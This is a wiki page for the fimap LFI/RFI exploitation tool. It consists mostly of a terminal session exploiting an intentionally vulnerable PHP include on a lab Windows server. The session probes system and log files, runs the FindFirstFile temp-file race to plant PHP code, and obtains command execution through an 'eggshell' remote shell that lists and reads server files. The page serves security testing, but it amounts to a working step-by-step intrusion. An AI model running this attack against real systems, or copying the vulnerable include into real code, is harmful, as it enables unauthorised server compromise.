-
Notifications
You must be signed in to change notification settings - Fork 99
FimapFindFirstFileExploit
Oweoqi edited this page Mar 27, 2015
·
1 revision
It only works on windows servers :)
<?php include($_GET["tmp"]); ?>
imax /st0rage/dev/fimap/src $ ./fimap.py -u "http://192.168.178.105/ex.php?tmp=a"
fimap v.1.00_svn (My life for Aiur)
:: Automatic LFI/RFI scanner and exploiter
:: by Iman Karim (fimap.dev@gmail.com)
SingleScan is testing URL: 'http://192.168.178.105/ex.php?tmp=a'
[12:08:27] [OUT] Inspecting URL 'http://192.168.178.105/ex.php?tmp=a'...
[12:08:27] [INFO] Fiddling around with URL...
[12:08:27] [OUT] [PHP] Possible file inclusion found! -> 'http://192.168.178.105/ex.php?tmp=V3ELOQJ0' with Parameter 'tmp'.
[12:08:27] [OUT] [PHP] Identifying Vulnerability 'http://192.168.178.105/ex.php?tmp=a' with Parameter 'tmp'...
[12:08:27] [INFO] Scriptpath received: 'C:\xampp\htdocs'
[12:08:27] [INFO] Operating System is 'Windows'.
[12:08:27] [INFO] Testing file 'c:\boot.ini'...
[12:08:27] [INFO] Testing file 'c:\windows\win.ini'...
[12:08:27] [INFO] Testing file 'php://input'...
[12:08:27] [INFO] Testing file 'C:\Program Files\Apache Group\Apache\logs\access.log'...
[12:08:27] [INFO] Testing file 'C:\Program Files\Apache Group\Apache\logs\access_log'...
[12:08:27] [INFO] Testing file 'http://www.phpbb.de/index.php'...
########################################################
#[1] Possible PHP-File Inclusion #
########################################################
#::REQUEST #
# [URL] http://192.168.178.105/ex.php?tmp=a #
# [HEAD SENT] #
#::VULN INFO #
# [GET PARAM] tmp #
# [PATH] C:\xampp\htdocs #
# [OS] Windows #
# [TYPE] Absolute Clean #
# [TRUNCATION] No Need. It's clean. #
# [READABLE FILES] #
# [0] c:\windows\win.ini #
########################################################
imax /st0rage/dev/fimap/src $
imax /st0rage/dev/fimap/src $ ./fimap.py -X
fimap v.1.00_svn (My life for Aiur)
:: Automatic LFI/RFI scanner and exploiter
:: by Iman Karim (fimap.dev@gmail.com)
#########################################################################
#:: List of Domains :: #
#########################################################################
#[1] 192.168.178.105 #
#[q] Quit #
#########################################################################
WARNING: Some domains may be not listed here because dynamic_rfi is not configured!
Choose Domain: 1
[11:34:31] [OUT] You have selected a file which is only readable.
[11:34:31] [OUT] Lets see if one of our plugins is interested in it...
#######################################################################
#Fallback Plugin Selection #
#######################################################################
#[1] [FindFirstFile] Launch FindFirstFile Glitch (Windows only)... #
#[2] [PHPInfo] Launch Coldwind/Insomnia Glitch... #
#[q] Quit #
#######################################################################
Your Selection: 1
###############################################################
#FindFirstFile Glitch #
###############################################################
#1. Enter Path of TempDir #
#2. AutoProbe for TempDir #
# Current TempDir: c:\xampp\tmp #
#3. Change number of attempts (Current: 5000) #
#4. Change number of threads (Current: 50) #
#5. Change eggdrop location (Current: c:\\xampp\\tmp\\egg) #
#6. Change your lottery ticket (Current: phpA<tmp) #
#7. Launch attack #
#0. WTF is this shit? #
#q. Back to fimap #
###############################################################
Choose action: 7
Launching attack...
Thread Attempt 1 started...
Thread Attempt 2 started...
Thread Attempt 3 started...
Thread Attempt 4 started...
Thread Attempt 5 started...
Thread Attempt 6 started...
Thread Attempt 7 started...
Thread Attempt 8 started...
Thread Attempt 9 started...
Thread Attempt 10 started...
Thread Attempt 11 started...
Thread Attempt 12 started...
Thread Attempt 13 started...
Thread Attempt 14 started...
Thread Attempt 15 started...
Thread Attempt 16 started...
Thread Attempt 17 started...
Thread Attempt 18 started...
Thread Attempt 19 started...
Thread Attempt 20 started...
Thread Attempt 21 started...
Thread Attempt 22 started...
Thread Attempt 23 started...
Thread Attempt 24 started...
Thread Attempt 25 started...
Thread Attempt 26 started...
Thread Attempt 27 started...
Thread Attempt 28 started...
Thread Attempt 29 started...
......................
......................
......................
Thread Attempt 304 started...
Thread Attempt 305 started...
Thread Attempt 306 started...
Thread Attempt 307 started...
Thread Attempt 308 started...
Egg dropped successfully!
Waiting for remaining threads to finish...
Hit CTRL+C to just kill the threads like an arse.
Finished.
PHP Code Injection thru EggDrop works!
[11:35:13] [INFO] Testing execution thru 'popen[b64][win]'...
[11:35:13] [OUT] Execution thru 'popen[b64][win]' works!
--------------------------------------------------------------------
Welcome to the fimap_eggshell!
This is a lite version of the fimap shell.
Consider this shell as a temporary shell you should get rid of asap.
Upload your own shell to be on the safe side.
--------------------------------------------------------------------
fimap_eggshell> dir
Volume in drive C has no label.
Volume Serial Number is 3CEF-FBFF
Directory of C:\xampp\htdocs
05.10.2012 13:22 <DIR> .
05.10.2012 13:22 <DIR> ..
16.04.2012 17:30 2.326 apache_pb.gif
16.04.2012 17:30 1.385 apache_pb.png
16.04.2012 17:30 2.414 apache_pb2.gif
16.04.2012 17:30 1.463 apache_pb2.png
16.04.2012 17:30 2.160 apache_pb2_ani.gif
05.10.2012 13:22 33 ex.php
16.04.2012 17:30 7.782 favicon.ico
05.10.2012 13:17 <DIR> forbidden
16.04.2012 17:30 202 index.html
16.04.2012 17:30 267 index.php
05.10.2012 13:17 <DIR> restricted
05.10.2012 13:21 <DIR> xampp
9 File(s) 18.032 bytes
5 Dir(s) 34.958.737.408 bytes free
fimap_eggshell> type ex.php
<?php
include($_GET["tmp"]);
?>
fimap_eggshell>